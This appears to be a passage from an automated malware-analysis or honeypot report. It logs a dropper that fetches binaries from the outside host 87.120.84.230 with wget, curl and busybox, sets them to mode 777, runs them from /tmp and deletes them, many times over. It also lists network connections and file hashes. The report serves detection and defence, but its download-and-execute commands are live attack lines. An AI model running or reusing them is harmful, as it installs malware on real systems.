[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/chmod
[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif
[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/rm
[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/wget
[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/chmod
[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb
[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/rm
[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/wget
[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/chmod
[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe
[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/rm
[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/wget
[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/chmod
[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK
[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/rm
[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/wget
[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/chmod
[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68
[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/rm
[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/wget
[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/chmod
[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i
[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/rm
[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/wget
[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/chmod
[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F
[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/rm
[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/wget
[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/chmod
[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E
[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/rm
[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/wget
[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/chmod
[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV
[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/rm
[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/wget
[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/chmod
[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby
[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/rm
[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/wget
[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/chmod
[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA
[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/rm
[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/wget
[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/chmod
[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D
[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/rm
[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/wget
[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/chmod
[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif
[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/rm
[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/wget
[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/chmod
[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb
[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/rm
[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/wget
[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/chmod
[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe
[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/rm
[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/wget
[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/chmod
[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK
[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/rm
[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/wget
[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/chmod
[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68
[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/rm
[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/wget
[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/chmod
[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/rm
[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/wget
[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/chmod
[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj
[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/rm
[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |